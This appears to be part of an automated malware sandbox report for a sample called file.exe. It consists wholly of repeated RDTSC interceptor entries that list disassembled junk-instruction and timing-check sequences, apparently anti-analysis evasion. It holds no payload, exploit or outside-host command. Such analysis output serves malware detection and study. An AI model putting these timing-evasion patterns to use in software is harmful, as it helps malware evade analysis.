              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF42A second address: 5CF437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FD000CC0C56h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF437 second address: 5CF44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A62h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF44F second address: 5CF453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF982 second address: 5CF998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A5Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007FD001095A56h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF998 second address: 5CF9BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FD000CC0C65h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF9BA second address: 5CF9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D04E0 second address: 5D04EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 jnp 00007FD000CC0C5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EF3 second address: 5D1EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D35D1 second address: 5D35D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D35D7 second address: 5D35DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DB79A second address: 5DB79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DB79E second address: 5DB7A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DB7A4 second address: 5DB7BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD000CC0C5Fh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DB7BD second address: 5DB7C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9CCE second address: 5D9CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9CD2 second address: 5D9CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A64h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9CF0 second address: 5D9CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9CF6 second address: 5D9CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA2DD second address: 5DA2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD000CC0C56h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA2F2 second address: 5DA2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA8DA second address: 5DA8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FD000CC0C56h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DABA9 second address: 5DABAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0E7A second address: 5E0E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0E7E second address: 5E0E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E250A second address: 5E2514 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2514 second address: 5E251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3A71 second address: 5E3A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C68h 0x00000009 jnc 00007FD000CC0C56h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3A94 second address: 5E3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD001095A5Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7004 second address: 5E7008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7185 second address: 5E718A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7693 second address: 5E76A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E76A5 second address: 5E76C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD001095A65h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1D2 second address: 5EF1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1D6 second address: 5EF1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1E0 second address: 5EF1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD000CC0C56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5EF second address: 5EF5F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF5F5 second address: 5EF601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD000CC0C56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF601 second address: 5EF605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF605 second address: 5EF62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C68h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF62A second address: 5EF62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF62E second address: 5EF64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C69h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF927 second address: 5EF92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF92D second address: 5EF932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF932 second address: 5EF951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD001095A56h 0x00000009 js 00007FD001095A56h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007FD001095A5Bh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFD95 second address: 5EFDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD000CC0C5Eh 0x0000000b jmp 00007FD000CC0C69h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFDC5 second address: 5EFDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A68h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0879 second address: 5F087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F087D second address: 5F0887 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0F9F second address: 5F0FBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jns 00007FD000CC0C56h 0x00000011 jo 00007FD000CC0C56h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0FBB second address: 5F0FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0FC1 second address: 5F0FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8546 second address: 5F854C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F854C second address: 5F8556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8556 second address: 5F8583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD001095A5Fh 0x0000000d jmp 00007FD001095A66h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F80FB second address: 5F810C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FD000CC0C56h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F810C second address: 5F8125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8125 second address: 5F813C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD000CC0C62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8291 second address: 5F829C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD001095A56h 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E51 second address: 604E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD000CC0C56h 0x00000009 jc 00007FD000CC0C56h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FD000CC0C60h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605006 second address: 60500A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60500A second address: 605020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FD000CC0C5Eh 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608A71 second address: 608A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD001095A56h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6087A9 second address: 6087B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6087B5 second address: 6087B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61874A second address: 618750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185EE second address: 61860C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD001095A70h 0x00000008 jmp 00007FD001095A64h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61860C second address: 61863A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007FD000CC0C5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61863A second address: 61863E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619D5F second address: 619D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD000CC0C63h 0x0000000a push edx 0x0000000b jnc 00007FD000CC0C56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619D80 second address: 619D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F7B6 second address: 61F7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD000CC0C56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD000CC0C5Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F7D3 second address: 61F7E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD001095A56h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625FDB second address: 625FFE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD000CC0C56h 0x00000008 jp 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FD000CC0C5Eh 0x00000016 jl 00007FD000CC0C56h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62492B second address: 624930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624D24 second address: 624D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624D36 second address: 624D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD001095A56h 0x0000000a jmp 00007FD001095A5Ah 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FCC second address: 624FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624FD2 second address: 624FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A5Eh 0x00000009 popad 0x0000000a jl 00007FD001095A58h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625125 second address: 625130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD000CC0C56h 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625130 second address: 625137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625C89 second address: 625C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625C91 second address: 625CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A60h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A04F second address: 62A058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643428 second address: 643438 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007FD001095A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6462AF second address: 6462CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C66h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6462CA second address: 6462D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD001095A56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6462D6 second address: 6462DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655D68 second address: 655D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FD001095A56h 0x0000000d js 00007FD001095A56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655D7D second address: 655DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD000CC0C65h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD000CC0C56h 0x00000015 jmp 00007FD000CC0C63h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DA2F second address: 53DA39 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6562E5 second address: 6562ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6562ED second address: 6562F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6562F9 second address: 656303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656303 second address: 65630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656479 second address: 656487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD000CC0C56h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656487 second address: 65648B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65648B second address: 6564AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 jc 00007FD000CC0C56h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FD000CC0C56h 0x00000018 jmp 00007FD000CC0C5Bh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6564AE second address: 6564C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FD001095A5Bh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65660E second address: 656614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656614 second address: 656628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD001095A5Ch 0x0000000d rdtsc
